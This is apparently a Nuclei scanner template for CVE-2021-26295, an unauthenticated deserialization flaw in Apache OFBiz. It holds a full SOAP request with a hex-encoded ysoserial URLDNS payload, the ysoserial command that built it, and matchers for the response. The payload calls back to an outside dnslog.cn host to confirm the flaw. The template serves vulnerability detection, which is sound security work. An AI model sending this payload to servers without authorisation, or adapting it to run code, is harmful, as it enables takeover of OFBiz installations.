id: CVE-2021-26295

info:
  name: Apache OFBiz <17.12.06 - Arbitrary Code Execution
  author: madrobot
  severity: critical
  description: Apache OFBiz has unsafe deserialization prior to 17.12.06 which can allow an unauthenticated attacker to successfully take over Apache OFBiz.
  reference:
    - https://github.com/yumusb/CVE-2021-26295-POC
    - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26295
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-26295
    cwe-id: CWE-502
  metadata:
    ysoserial-payload: java -jar ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn | hex
  tags: apache,cve,cve2021,rce,ofbiz

requests:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <soapenv:Envelope
            xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
            <soapenv:Header/>
            <soapenv:Body>
                <ser>
                    <map-HashMap>
                        <map-Entry>
                            <map-Key>
                                <cus-obj>bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a</cus-obj>
                            </map-Key>
                            <map-Value>
                                <std-String value="http://t53lq9.dnslog.cn/"></std-String>
                            </map-Value>
                        </map-Entry>
                    </map-HashMap>
                </ser>
            </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "OFBiz.Visitor="
        part: header

      - type: word
        words:
          - "deserializing"
          - "errorMessage"
        part: body
        condition: and


# Enhanced by mp on 2022/05/17